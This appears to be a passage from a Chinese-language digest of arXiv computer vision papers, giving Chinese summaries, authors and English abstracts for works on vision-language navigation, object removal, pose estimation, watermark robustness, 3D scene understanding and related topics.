类目: Computer Vision and Pattern Recognition (cs.CV); Optimization and Control (math.OC)
备注: This paper introduces a robust model for cartoon-texture image decomposition with heavy-tailed noise. It has 11 figures and 4 tables
Abstract:Cartoon-texture image decomposition is a fundamental yet challenging problem in image processing. A significant hurdle in achieving accurate decomposition is the pervasive presence of noise in the observed images, which severely impedes robust results. To address the challenging problem of cartoon-texture decomposition in the presence of heavy-tailed noise, we in this paper propose a robust low-rank prior model. Our approach departs from conventional models by adopting the Huber loss function as the data-fidelity term, rather than the traditional \ell_2 -norm, while retaining the total variation norm and nuclear norm to characterize the cartoon and texture components, respectively. Given the inherent structure, we employ two implementable operator splitting algorithms, tailored to different degradation operators. Extensive numerical experiments, particularly on image restoration tasks under high-intensity heavy-tailed noise, efficiently demonstrate the superior performance of our model.
[CV-152] Structured Observation Language for Efficient and Generalizable Vision-Language Navigation
【速读】:该论文旨在解决视觉-语言导航(Vision-Language Navigation, VLN)任务中因视觉与语言模态融合不充分而导致的模型对环境变化敏感、泛化能力差的问题。现有方法通常依赖大规模视觉预训练将原始图像转化为视觉标记或隐式特征,导致模型在光照、纹理等环境变化下性能下降。其解决方案的关键在于提出SOL-Nav框架,该框架通过将第一人称RGB-D图像划分为N×N网格,并提取每个网格单元的语义、颜色和深度信息生成结构化的语言描述,再与自然语言指令拼接作为纯文本输入至预训练语言模型(Pre-trained Language Model, PLM),从而实现高效且可泛化的导航决策,显著降低模型规模和训练数据依赖,同时充分发挥PLM的推理与表征能力。
链接: https://arxiv.org/abs/2603.27577
作者: Daojie Peng,Fulong Ma,Jun Ma
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Robotics (cs.RO)
备注:
Abstract:Vision-Language Navigation (VLN) requires an embodied agent to navigate complex environments by following natural language instructions, which typically demands tight fusion of visual and language modalities. Existing VLN methods often convert raw images into visual tokens or implicit features, requiring large-scale visual pre-training and suffering from poor generalization under environmental variations (e.g., lighting, texture). To address these issues, we propose SOL-Nav (Structured Observation Language for Navigation), a novel framework that translates egocentric visual observations into compact structured language descriptions for efficient and generalizable navigation. Specifically, we divide RGB-D images into a N*N grid, extract representative semantic, color, and depth information for each grid cell to form structured text, and concatenate this with the language instruction as pure language input to a pre-trained language model (PLM). Experimental results on standard VLN benchmarks (R2R, RxR) and real-world deployments demonstrate that SOL-Nav significantly reduces the model size and training data dependency, fully leverages the reasoning and representation capabilities of PLMs, and achieves strong generalization to unseen environments.
[CV-153] Learning to See through Illumination Extremes with Event Streaming in Multimodal Large Language Models CVPR
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在极端光照条件下视觉-语言推理性能显著下降的问题,此时RGB输入因曝光过度或不足而丢失结构与语义信息。解决方案的核心在于提出Event-MLLM,通过动态融合事件流(event stream)与RGB帧实现全光照环境下的视觉推理能力;其关键创新包括:(1) 光照指示器(Illumination Indicator)——基于DINOv2分支学习得到的可训练信号,用于表征曝光退化程度并自适应调节事件与RGB特征的融合权重;(2) 光照校正损失(Illumination Correction Loss)——在潜在空间中对齐融合特征与正常光照下的语义表示,以补偿极端光照下丢失的信息。
链接: https://arxiv.org/abs/2603.27558
作者: Baoheng Zhang,Jiahui Liu,Gui Zhao,Weizhou Zhang,Yixuan Ma,Jun Jiang,Yingxian Chen,Wilton W.T. Fok,Xiaojuan Qi,Hayden Kwok-Hay So
机构: The University of Hong Kong (香港大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: IEEE/CVF Conference on Computer Vision and Pattern Recognition (CVPR) 2026
Abstract:Multimodal Large Language Models (MLLMs) perform strong vision-language reasoning under standard conditions but fail in extreme illumination, where RGB inputs lose irrevocable structure and semantics. We propose Event-MLLM, an event-enhanced model that performs all-light visual reasoning by dynamically fusing event streams with RGB frames. Two key components drive our approach: an Illumination Indicator - a learnable signal derived from a DINOv2 branch that represents exposure degradation and adaptively modulates event-RGB fusion - and an Illumination Correction Loss that aligns fused features with non-degraded (normal-light) semantics in the latent space, compensating for information lost in extreme lighting. We curate the first multi-illumination event-instruction corpus for MLLMs, with 2,241 event-RGB samples (around 6 QA pairs each) across diverse scenes and 17 brightness rates (0.05x - 20x), plus an instruct-following benchmark for reasoning, counting, and fine-grained recognition under extreme lighting. Experiments show that Event-MLLM markedly outperforms general-purpose, illumination-adaptive, and event-only baselines, setting a new state of the art in robust multimodal perception and reasoning under challenging illumination.
[CV-154] owards Domain-Generalized Open-Vocabulary Object Detection: A Progressive Domain-invariant Cross-modal Alignment Method
【速读】:该论文旨在解决开放词汇目标检测(Open-Vocabulary Object Detection, OVOD)在分布偏移(distribution shift)场景下性能退化的问题,特别是揭示了视觉流形与文本嵌入之间脆弱耦合导致的跨域泛化能力不足。其核心贡献在于提出了一种渐进式域不变跨模态对齐方法(Progressive Domain-invariant Cross-modal Alignment, PICA),关键创新点在于引入多层级模糊性和信号强度课程学习机制,通过自适应构建伪词原型并结合样本置信度与视觉一致性进行迭代优化,从而增强跨域条件下视觉与语义空间的稳定对齐,提升OVOD系统在非静态环境中的鲁棒性。
链接: https://arxiv.org/abs/2603.27556
作者: Xiaoran Xu,Xiaoshan Yang,Jiangang Yang,Yifan Xu,Jian Liu,Changsheng Xu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Open-Vocabulary Object Detection (OVOD) has achieved remarkable success in generalizing to novel categories. However, this success often rests on the implicit assumption of domain stationarity. In this work, we provide a principled revisit of the OVOD paradigm, uncovering a fundamental vulnerability: the fragile coupling between visual manifolds and textual embeddings when distribution shifts occur. We first systematically formalize Domain-Generalized Open-Vocabulary Object Detection (DG-OVOD). Through empirical analysis, we demonstrate that visual shifts do not merely add noise; they cause a collapse of the latent cross-modal space where novel category visual signals detach from their semantic anchors. Motivated by these insights, we propose Progressive Domain-invariant Cross-modal Alignment (PICA). PICA departs from uniform training by introducing a multi-level ambiguity and signal strength curriculum. It builds adaptive pseudo-word prototypes, refined via sample confidence and visual consistency, to enforce invariant cross-domain modality alignment. Our findings suggest that OVOD’s robustness to domain shifts is intrinsically linked to the stability of the latent cross-modal alignment space. Our work provides both a challenging benchmark and a new perspective on building truly generalizable open-vocabulary systems that extend beyond static laboratory conditions. Subjects: Computer Vision and Pattern Recognition (cs.CV) Cite as: arXiv:2603.27556 [cs.CV] (or arXiv:2603.27556v1 [cs.CV] for this version) https://doi.org/10.48550/arXiv.2603.27556 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Submission history From: Xiaoran Xu [view email] [v1] Sun, 29 Mar 2026 07:39:31 UTC (7,290 KB)
[CV-155] PANDORA: Pixel-wise Attention Dissolution and Latent Guidance for Zero-Shot Object Removal ICME2026
【速读】:该论文旨在解决自然图像中对象移除(object removal)的挑战,即在保持背景完整性的同时合成语义一致的内容,现有方法常依赖微调、提示工程或推理时优化,但仍存在纹理不一致、刚性伪影、前景与背景解耦能力弱及多对象移除扩展性差等问题。其解决方案的关键在于提出一种零样本(zero-shot)框架PANDORA,直接作用于预训练文本到图像扩散模型,无需微调、提示或优化;核心创新包括Pixel-wise Attention Dissolution(像素级注意力消解),通过抑制掩码像素最相关的注意力键来中断自注意力流,使背景上下文主导重建;以及Localized Attentional Disentanglement Guidance(局部注意力解耦引导),引导去噪过程朝向有利于干净对象移除的潜在流形发展,从而实现精确、非刚性、免提示且单次通过即可完成的多对象擦除。
链接: https://arxiv.org/abs/2603.27555
作者: Dinh-Khoi Vo,Van-Loc Nguyen,Tam V. Nguyen,Minh-Triet Tran,Trung-Nghia Le
机构: University of Science, Ho Chi Minh City, Vietnam (胡志明市科学大学); Vietnam National University, Ho Chi Minh City, Vietnam (胡志明市国立大学); University of Dayton, Ohio, United States (代顿大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: ICME 2026
Abstract:Removing objects from natural images is challenging due to difficulty of synthesizing semantically coherent content while preserving background integrity. Existing methods often rely on fine-tuning, prompt engineering, or inference-time optimization, yet still suffer from texture inconsistency, rigid artifacts, weak foreground-background disentanglement, and poor scalability for multi-object removal. We propose a novel zero-shot object removal framework, namely PANDORA, that operates directly on pre-trained text-to-image diffusion models, requiring no fine-tuning, prompts, or optimization. We propose Pixel-wise Attention Dissolution to remove object by nullifying the most correlated attention keys for masked pixels, effectively eliminating the object from self-attention flow and allowing background context to dominate reconstruction. We further introduce Localized Attentional Disentanglement Guidance to steer denoising toward latent manifolds favorable to clean object removal. Together, these components enable precise, non-rigid, prompt-free, and scalable multi-object erasure in a single pass. Experiments demonstrate superior visual fidelity and semantic plausibility compared to state-of-the-art methods. The project page is available at this https URL.
[CV-156] Annotation-Free Detection of Drivable Areas and Curbs Leverag ing LiDAR Point Cloud Maps
【速读】:该论文旨在解决自动驾驶中可行驶区域(drivable area)与路缘(curb)检测任务依赖大规模人工标注数据的问题,此类数据获取成本高、效率低且受限于专家资源,制约了深度神经网络(Deep Neural Networks, DNNs)在真实场景中的应用。其解决方案的关键在于提出一种基于地图的自动数据标注模块(Map-based Automatic Data Labeler, MADL),该模块融合LiDAR建图与定位信息,结合路缘检测能力,实现对可行驶区域和路缘的自动化标注,有效规避了单帧LiDAR点云稀疏性和遮挡问题,从而生成高质量、大规模的训练数据集;同时引入数据审查代理(data review agent)进一步过滤低质量样本,显著提升标注数据的准确性与鲁棒性。
链接: https://arxiv.org/abs/2603.27553
作者: Fulong Ma,Daojie Peng,Jun Ma
机构: The Hong Kong University of Science and Technology (Guangzhou) (香港科技大学(广州))
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Drivable areas and curbs are critical traffic elements for autonomous driving, forming essential components of the vehicle visual perception system and ensuring driving safety. Deep neural networks (DNNs) have significantly improved perception performance for drivable area and curb detection, but most DNN-based methods rely on large manually labeled datasets, which are costly, time-consuming, and expert-dependent, limiting their real-world application. Thus, we developed an automated training data generation module. Our previous work generated training labels using single-frame LiDAR and RGB data, suffering from occlusion and distant point cloud sparsity. In this paper, we propose a novel map-based automatic data labeler (MADL) module, combining LiDAR mapping/localization with curb detection to automatically generate training data for both tasks. MADL avoids occlusion and point cloud sparsity issues via LiDAR mapping, creating accurate large-scale datasets for DNN training. In addition, we construct a data review agent to filter the data generated by the MADL module, eliminating low-quality samples. Experiments on the KITTI, KITTI-CARLA and 3D-Curb datasets show that MADL achieves impressive performance compared to manual labeling, and outperforms traditional and state-of-the-art self-supervised methods in robustness and accuracy.
[CV-157] MV-RoMa: From Pairwise Matching into Multi-View Track Reconstruction CVPR2026
【速读】:该论文旨在解决多视图三维视觉任务中,现有匹配方法多以成对方式操作导致轨迹碎片化和几何不一致的问题。其核心挑战在于如何在多个共视图像之间建立稠密且几何一致的对应关系,从而提升结构从运动(SfM)等任务的重建质量。解决方案的关键在于提出MV-RoMa模型:首先设计了一个多视图编码器,利用成对匹配结果作为几何先验来降低计算复杂度;其次引入一个多视图匹配精炼模块,通过像素级注意力机制优化对应关系;最后结合后处理策略将一致的多视图对应关系整合为高质量轨迹用于SfM重建,显著提升了重建密度与准确性。
链接: https://arxiv.org/abs/2603.27542
作者: Jongmin Lee,Seungyeop Kang,Sungjoo Yoo
机构: KAIST; Seoul National University
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR 2026 Accepted
Abstract:Establishing consistent correspondences across images is essential for 3D vision tasks such as structure-from-motion (SfM), yet most existing matchers operate in a pairwise manner, often producing fragmented and geometrically inconsistent tracks when their predictions are chained across views. We propose MV-RoMa, a multi-view dense matching model that jointly estimates dense correspondences from a source image to multiple co-visible targets. Specifically, we design an efficient model architecture which avoids high computational cost of full cross-attention for multi-view feature interaction: (i) multi-view encoder that leverages pair-wise matching results as a geometric prior, and (ii) multi-view matching refiner that refines correspondences using pixel-wise attention. Additionally, we propose a post-processing strategy that integrates our model’s consistent multi-view correspondences as high-quality tracks for SfM. Across diverse and challenging benchmarks, MV-RoMa produces more reliable correspondences and substantially denser, more accurate 3D reconstructions than existing sparse and dense matching methods. Project page: this https URL.
[CV-158] Demo-Pose: Depth-Monocular Modality Fusion For Object Pose Estimation ICASSP2026
【速读】:该论文旨在解决类别级9自由度(9-DoF)姿态估计问题,即从RGB-D输入中同时预测物体的6D姿态(3D位置和3D旋转)与3D尺寸,且在推理阶段无需依赖CAD模型。现有方法存在两大局限:纯深度方法忽略RGB语义信息,而多数RGB-D融合模型因跨模态融合策略不佳,未能有效对齐RGB语义特征与3D几何表示。其解决方案的关键在于提出一种混合架构DeMo-Pose,通过一种新颖的多模态融合策略,将单目语义特征与基于深度图的图卷积表示进行深度融合;此外,引入Mesh-Point Loss(MPL),利用网格结构在训练阶段增强几何感知能力,且不增加推理开销。该方法在REAL275基准上显著优于当前最优方法GPV-Pose,在3D IoU上提升3.2%,姿态精度提升11.1%。
链接: https://arxiv.org/abs/2603.27533
作者: Rachit Agarwal,Abhishek Joshi,Sathish Chalasani,Woo Jin Kim
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注: Accepted at ICASSP 2026, 5 pages, 3 figures, 3 tables
Abstract:Object pose estimation is a fundamental task in 3D vision with applications in robotics, AR/VR, and scene understanding. We address the challenge of category-level 9-DoF pose estimation (6D pose + 3Dsize) from RGB-D input, without relying on CAD models during inference. Existing depth-only methods achieve strong results but ignore semantic cues from RGB, while many RGB-D fusion models underperform due to suboptimal cross-modal fusion that fails to align semantic RGB cues with 3D geometric representations. We propose DeMo-Pose, a hybrid architecture that fuses monocular semantic features with depth-based graph convolutional representations via a novel multimodal fusion strategy. To further improve geometric reasoning, we introduce a novel Mesh-Point Loss (MPL) that leverages mesh structure during training without adding inference overhead. Our approach achieves real-time inference and significantly improves over state-of-the-art methods across object categories, outperforming the strong GPV-Pose baseline by 3.2% on 3D IoU and 11.1% on pose accuracy on the REAL275 benchmark. The results highlight the effectiveness of depth-RGB fusion and geometry-aware learning, enabling robust category-level 3D pose estimation for real-world applications.
[CV-159] OmniColor: A Unified Framework for Multi-modal Lineart Colorization
【速读】:该论文旨在解决线稿上色(lineart colorization)在多样化用户约束下难以实现精确且灵活控制的问题。其核心挑战在于如何统一处理多种模态的引导信号(guidance signals),并确保颜色恢复的边界保真度与时间稳定性。解决方案的关键在于提出OmniColor框架,通过系统性地将引导信号分为空间对齐条件(spatially-aligned conditions)和语义参考条件(semantic-reference conditions),分别采用双路径编码结合密集特征对齐损失(Dense Feature Alignment loss)以强化边界保持,以及基于视觉语言模型(VLM-only)的编码与时间冗余消除机制(Temporal Redundancy Elimination)提升推理效率;同时引入自适应空间-语义门控模块(Adaptive Spatial-Semantic Gating module)动态平衡多模态约束,从而实现高可控性、高质量和时序稳定的线稿上色效果。
链接: https://arxiv.org/abs/2603.27531
作者: Xulu Zhang,Haoqian Du,Xiaoyong Wei,Qing Li
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Lineart colorization is a critical stage in professional content creation, yet achieving precise and flexible results under diverse user constraints remains a significant challenge. To address this, we propose OmniColor, a unified framework for multi-modal lineart colorization that supports arbitrary combinations of control signals. Specifically, we systematically categorize guidance signals into two types: spatially-aligned conditions and semantic-reference conditions. For spatially-aligned inputs, we employ a dual-path encoding strategy paired with a Dense Feature Alignment loss to ensure rigorous boundary preservation and precise color restoration. For semantic-reference inputs, we utilize a VLM-only encoding scheme integrated with a Temporal Redundancy Elimination mechanism to filter repetitive information and enhance inference efficiency. To resolve potential input conflicts, we introduce an Adaptive Spatial-Semantic Gating module that dynamically balances multi-modal constraints. Experimental results demonstrate that OmniColor achieves superior controllability, visual quality, and temporal stability, providing a robust and practical solution for lineart colorization. The source code and dataset will be open at this https URL.
[CV-160] okenDial: Continuous Attribute Control in Text-to-Video via Spatiotemporal Token Offsets
【速读】:该论文旨在解决预训练文本到视频生成模型在属性控制方面的局限性问题,即现有方法难以实现对属性变化程度(如效果强度或运动幅度)的连续、精确调控,同时保持视频身份、背景和时序一致性的稳定性。解决方案的关键在于提出TokenDial框架,其核心创新是利用中间时空视觉补丁标记(spatiotemporal visual patch-token)空间中的加性偏移量作为语义控制方向,通过调整偏移量的幅度可实现外观与运动动态的连贯且可预测的编辑,且无需重新训练主干模型;具体实现上,借助预训练模型中的理解信号——外观属性采用语义方向匹配,运动属性则通过运动幅度缩放进行建模,从而实现了高效、高保真的属性连续控制。
链接: https://arxiv.org/abs/2603.27520
作者: Zhixuan Liu,Peter Schaldenbrand,Yijun Li,Long Mai,Aniruddha Mahapatra,Cusuh Ham,Jean Oh,Jui-Hsien Wang
机构: Adobe Research(Adobe研究院); Carnegie Mellon University(卡内基梅隆大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: Project page: this https URL
Abstract:We present TokenDial, a framework for continuous, slider-style attribute control in pretrained text-to-video generation models. While modern generators produce strong holistic videos, they offer limited control over how much an attribute changes (e.g., effect intensity or motion magnitude) without drifting identity, background, or temporal coherence. TokenDial is built on the observation: additive offsets in the intermediate spatiotemporal visual patch-token space form a semantic control direction, where adjusting the offset magnitude yields coherent, predictable edits for both appearance and motion dynamics. We learn attribute-specific token offsets without retraining the backbone, using pretrained understanding signals: semantic direction matching for appearance and motion-magnitude scaling for motion. We demonstrate TokenDial’s effectiveness on diverse attributes and prompts, achieving stronger controllability and higher-quality edits than state-of-the-art baselines, supported by extensive quantitative evaluation and human studies.
[CV-161] SPROUT: A Scalable Diffusion Foundation Model for Agricultural Vision
【速读】:该论文旨在解决视觉基础模型(Vision Foundation Models, VFM)在农业场景中因域差距(domain gap)导致性能显著下降的问题。现有VFM通常在大规模无标签通用图像数据上预训练,但在农业任务中表现不佳,主要受限于作物多样性、生长阶段差异及环境复杂性等因素。解决方案的关键在于提出一种名为SPROUT(Scalable Plant Representation model via Open-field Unsupervised Training)的多作物、多任务农业基础模型,其核心创新是采用无VAE(Variational Autoencoder)的像素空间扩散Transformer(Pixel-space Diffusion Transformer)进行去噪训练,从而学习结构感知的植物表征,并支持高效端到端训练。该方法在包含260万张高质量农业图像的数据集上预训练,显著提升了下游农业任务的泛化能力,同时大幅降低预训练成本。
链接: https://arxiv.org/abs/2603.27519
作者: Shuai Xiang,Wei Guo,James Burridge,Shouyang Liu,Hao Lu,Tokihiro Fukatsu
机构: The University of Tokyo (东京大学); Nanjing Agricultural University (南京农业大学); Huazhong University of Science and Technology (华中科技大学); NARO (日本农业研究机构); University of Tsukuba (筑波大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Vision Foundation Models (VFM) pre-trained on large-scale unlabeled data have achieved remarkable success on general computer vision tasks, yet typically suffer from significant domain gaps when applied to agriculture. In this context, we introduce SPROUT ( S calable P lant R epresentation model via O pen-field U nsupervised T raining), a multi-crop, multi-task agricultural foundation model trained via diffusion denoising. SPROUT leverages a VAE-free Pixel-space Diffusion Transformer to learn rich, structure-aware representations through denoising and enabling efficient end-to-end training. We pre-train SPROUT on a curated dataset of 2.6 million high-quality agricultural images spanning diverse crops, growth stages, and environments. Extensive experiments demonstrate that SPROUT consistently outperforms state-of-the-art web-pretrained and agricultural foundation models across a wide range of downstream tasks, while requiring substantially lower pre-training cost. The code and model are available at this https URL.
[CV-162] SGS-Intrinsic: Semantic-Invariant Gaussian Splatting for Sparse-View Indoor Inverse Rendering CVPR2026
【速读】:该论文旨在解决现有基于3D高斯泼溅(3D Gaussian Splatting, 3DGS)的室内逆渲染(inverse rendering)方法在稀疏视图(sparse-view)条件下失效的问题,尤其是这些方法通常聚焦于物体中心重建,在有限视角下难以实现高质量几何重建和材质-光照解耦。解决方案的关键在于构建一个由语义与几何先验引导的密集且几何一致的高斯语义场(Gaussian semantic field),为后续逆渲染提供可靠基础;在此基础上,通过融合混合光照模型与材质先验实现材质与光照的有效解耦,并引入光照不变材质约束及去阴影模型以缓解投射阴影对材质恢复的影响,从而提升整体逆渲染的鲁棒性与精度。
链接: https://arxiv.org/abs/2603.27516
作者: Jiahao Niu,Rongjia Zheng,Wenju Xu,WeiShi Zheng,Qing Zhang
机构: Sun Yat-sen University (中山大学); Amazon (亚马逊)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注: CVPR2026
Abstract:We present SGS-Intrinsic, an indoor inverse rendering framework that works well for sparse-view images. Unlike existing 3D Gaussian Splatting (3DGS) based methods that focus on object-centric reconstruction and fail to work under sparse view settings, our method allows to achieve high-quality geometry reconstruction and accurate disentanglement of material and illumination. The core idea is to construct a dense and geometry-consistent Gaussian semantic field guided by semantic and geometric priors, providing a reliable foundation for subsequent inverse rendering. Building upon this, we perform material-illumination disentanglement by combining a hybrid illumination model and material prior to effectively capture illumination-material interactions. To mitigate the impact of cast shadows and enhance the robustness of material recovery, we introduce illumination-invariant material constraint together with a deshadowing model. Extensive experiments on benchmark datasets show that our method consistently improves both reconstruction fidelity and inverse rendering quality over existing 3DGS-based inverse rendering approaches. Our code is available at this https URL.
[CV-163] Understanding Semantic Perturbations on In-Processing Generative Image Watermarks
【速读】:该论文旨在解决生成式 AI (Generative AI) 中内容溯源与认证机制在面对语义漂移(semantic drift)时的鲁棒性不足问题。当前主流的内嵌水印(in-processing watermarking)方法虽被证明对常规后处理操作(如几何变换和滤波)具有鲁棒性,但对保留视觉质量的同时改变高阶场景语义内容的编辑行为缺乏系统评估。其解决方案的关键在于提出一个多阶段、模块化的压力测试框架,利用现成的物体检测、掩码生成和语义引导修复/重生成模型,实现可控且语义意义发生改变的图像编辑,从而系统性地检验水印在语义扰动下的稳定性。实验表明,水印鲁棒性与其语义纠缠程度密切相关,许多现有方法在语义编辑下检测率骤降至接近零,揭示了当前水印评估体系的重大盲区,并强调未来设计需明确考虑对抗语义操纵的能力。
链接: https://arxiv.org/abs/2603.27513
作者: Anirudh Nakra,Min Wu
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
Abstract:The widespread deployment of high-fidelity generative models has intensified the need for reliable mechanisms for provenance and content authentication. In-processing watermarking, embedding a signature into the generative model’s synthesis procedure, has been advocated as a solution and is often reported to be robust to standard post-processing (such as geometric transforms and filtering). Yet robustness to semantic manipulations that alter high-level scene content while maintaining reasonable visual quality is not well studied or understood. We introduce a simple, multi-stage framework for systematically stress-testing in-processing generative watermarks under semantic drift. The framework utilizes off-the-shelf models for object detection, mask generation, and semantically guided inpainting or regeneration to produce controlled, meaning-altering edits with minimal perceptual degradation. Based on extensive experiments on representative schemes, we find that robustness varies significantly with the degree of semantic entanglement: methods by which watermarks remain detectable under a broad suite of conventional perturbations can fail under semantic edits, with watermark detectability in many cases dropping to near zero while image quality remains high. Overall, our results reveal a critical gap in current watermarking evaluations and suggest that watermark designs and benchmarking must explicitly account for robustness against semantic manipulation.
[CV-164] Chat-Scene: Exploiting Context-Rich Object Identification for 3D LLM
【速读】:该论文旨在解决多模态大语言模型(Multi-modal Large Language Models, MLLMs)在3D场景理解中面临的细粒度物体定位(fine-grained object grounding)与上下文推理能力不足的问题,从而限制其对复杂3D环境的解析与交互能力。解决方案的关键在于提出Chat-Scene++框架,通过将3D场景表示为富含语义信息的物体序列(context-rich object sequences),实现以物体为中心的表征与推理;该框架利用大规模预训练的3D场景级和2D图像级编码器提取具有上下文感知能力的物体特征,替代传统孤立的单物体特征,并支持基于物体标识符的链式思维(grounded chain-of-thought, G-CoT)推理,使模型能够在类别和空间两个维度上区分对象,进而无需任务特定头或微调即可在五个主流3D视觉语言基准上达到最先进性能。
链接: https://arxiv.org/abs/2603.27507
作者: Haifeng Huang,Yilun Chen,Zehan Wang,Jiangmiao Pang,Zhou Zhao
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Recent advancements in multi-modal large language models (MLLMs) have shown strong potential for 3D scene understanding. However, existing methods struggle with fine-grained object grounding and contextual reasoning, limiting their ability to interpret and interact with complex 3D environments. In this paper, we present Chat-Scene++, an MLLM framework that represents 3D scenes as context-rich object sequences. By structuring scenes as sequences of objects with contextual semantics, Chat-Scene++ enables object-centric representation and interaction. It decomposes a 3D scene into object representations paired with identifier tokens, allowing LLMs to follow instructions across diverse 3D vision-language tasks. To capture inter-object relationships and global semantics, Chat-Scene++ extracts context-rich object features using large-scale pre-trained 3D scene-level and 2D image-level encoders, unlike the isolated per-object features in Chat-Scene. Its flexible object-centric design also supports grounded chain-of-thought (G-CoT) reasoning, enabling the model to distinguish objects at both category and spatial levels during multi-step inference. Without the need for additional task-specific heads or fine-tuning, Chat-Scene++ achieves state-of-the-art performance on five major 3D vision-language benchmarks: ScanRefer, Multi3DRefer, Scan2Cap, ScanQA, and SQA3D. These results highlight its effectiveness in scene comprehension, object grounding, and spatial reasoning. Additionally, without reconstructing 3D worlds through computationally expensive processes, we demonstrate its applicability to real-world scenarios using only 2D inputs.
[CV-165] ransferring Physical Priors into Remote Sensing Segmentation via Large Language Models
【速读】:该论文旨在解决遥感影像语义分割中因依赖空间对齐数据和昂贵的重新训练而难以融合多源物理变量(如数字高程模型、合成孔径雷达和归一化植被指数)的问题。其解决方案的关键在于提出一种以物理先验为中心的知识图谱(Physical-Centric Knowledge Graph, PCKG),通过大语言模型从1,763个词汇中提取物理先验,构建异构且空间对齐的数据集Phy-Sky-SA,并设计PriorSeg模型,采用视觉-物理联合训练策略与新颖的物理一致性损失函数,在不重新训练基础模型的前提下显著提升分割精度与物理合理性。
链接: https://arxiv.org/abs/2603.27504
作者: Yuxi Lu,Kunqi Li,Zhidong Li,Xiaohan Su,Biao Wu,Chenya Huang,Bin Liang
机构: 未知
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Semantic segmentation of remote sensing imagery is fundamental to Earth observation. Achieving accurate results requires integrating not only optical images but also physical variables such as the Digital Elevation Model (DEM), Synthetic Aperture Radar (SAR) and Normalized Difference Vegetation Index (NDVI). Recent foundation models (FMs) leverage pre-training to exploit these variables but still depend on spatially aligned data and costly retraining when involving new sensors. To overcome these limitations, we introduce a novel paradigm for integrating domain-specific physical priors into segmentation models. We first construct a Physical-Centric Knowledge Graph (PCKG) by prompting large language models to extract physical priors from 1,763 vocabularies, and use it to build a heterogeneous, spatial-aligned dataset, Phy-Sky-SA. Building on this foundation, we develop PriorSeg, a physics-aware residual refinement model trained with a joint visual-physical strategy that incorporates a novel physics-consistency loss. Experiments on heterogeneous settings demonstrate that PriorSeg improves segmentation accuracy and physical plausibility without retraining the FMs. Ablation studies verify the effectiveness of the Phy-Sky-SA dataset, the PCKG, and the physics-consistency loss.
[CV-166] Streamlined Open-Vocabulary Human-Object Interaction Detection
【速读】:该论文旨在解决开放词汇人类-物体交互(Open-vocabulary Human-Object Interaction, HOI)检测中因跨模型表示差异导致的特征融合难题。现有方法通常依赖传统HOI检测器与视觉语言模型(Vision-Language Model, VLM)协同工作以识别训练阶段未见的HOI类别,但受限于两者在特征空间上的显著差异,难以实现高效融合。其解决方案的关键在于提出SL-HOI框架,该框架完全基于强大的DINOv3模型构建,充分利用其主干网络进行细粒度定位和文本对齐视觉头(text-aligned vision head)进行开放词汇交互分类;并通过将交互查询(interaction queries)与主干图像token同时输入视觉头,有效弥合二者间的表征鸿沟,从而实现平滑的跨注意力机制。整个模型仅引入少量可学习参数且冻结DINOv3所有参数,实现了快速适应HOI任务并取得SOTA性能。
链接: https://arxiv.org/abs/2603.27500
作者: Chang Sun,Dongliang Liao,Changxing Ding
机构: South China University of Technology (华南理工大学)
类目: Computer Vision and Pattern Recognition (cs.CV)
备注:
Abstract:Open-vocabulary human-object interaction (HOI) detection aims to localize and recognize all human-object interactions in an image, including those unseen during training. Existing approaches usually rely on the collaboration between a conventional HOI detector and a Vision-Language Model (VLM) to recognize unseen HOI categories. However, feature fusion in this paradigm is challenging due to significant gaps in cross-model representations. To address this issue, we introduce SL-HOI, a StreamLined open-vocabulary HOI detection framework based solely on the powerful DINOv3 model. Our design leverages the complementary strengths of DINOv3’s components: its backbone for fine-grained localization and its text-aligned vision head for open-vocabulary interaction classification. Moreover, to facilitate smooth cross-attention between the interaction queries and the vision head’s output, we propose first feeding both the interaction queries and the backbone image tokens into the vision head, effectively bridging their representation gaps. All DINOv3 parameters in our approach are frozen, with only a small number of learnable parameters added, allowing a fast adaptation to the HOI detection task. Extensive experiments show that SL-HOI achieves state-of-the-art performance on both the SWiG-HOI and HICO-DET benchmarks, demonstrating the effectiveness of our streamlined model architecture. Code is available at this https URL.
[CV-167] Learning to Focus and Precise Cropping: A Reinforcement Learning Framework with Information Gaps and Grounding Loss for MLLM s
【速读】:该论文旨在解决多模态大语言模型(Multimodal Large Language Models, MLLMs)在复杂视觉场景中对细粒度视觉信息感知与推理能力不足的问题,尤其关注模型在使用图像裁剪工具进行区域分析时对裁剪区域细节依赖较弱、过度依赖全局图像输入的局限性。解决方案的关键在于提出一种无需轨迹监督的两阶段强化学习框架:第一阶段引入“信息缺口”(Information Gap)机制,通过调整全局图像的粒度,引导模型基于裁剪区域的信息增益来回答问题;第二阶段通过引入少量边界框标注的接地损失(grounding loss),进一步提升裁剪精度。该方法显著增强了模型对裁剪区域的关注,从而在高分辨率视觉问答基准上达到当前最优性能。
链接: https://arxiv.org/abs/2603.27494
作者: Xuanpu Zhao,Zhentao Tan,Dianmo Sheng,Tianxiang Chen,Yao Liu,Yue Wu,Tao Gong,Qi Chu,Nenghai Yu
机构: School of Cyber Science and Technology, University of Science and Technology of China (中国科学技术大学网络科学与技术学院); Anhui Province Key Laboratory of Digital Security (安徽省数字安全重点实验室)
类目: Computer Vision and Pattern Recognition (cs.CV); Artificial Intelligence (cs.AI)
备注:
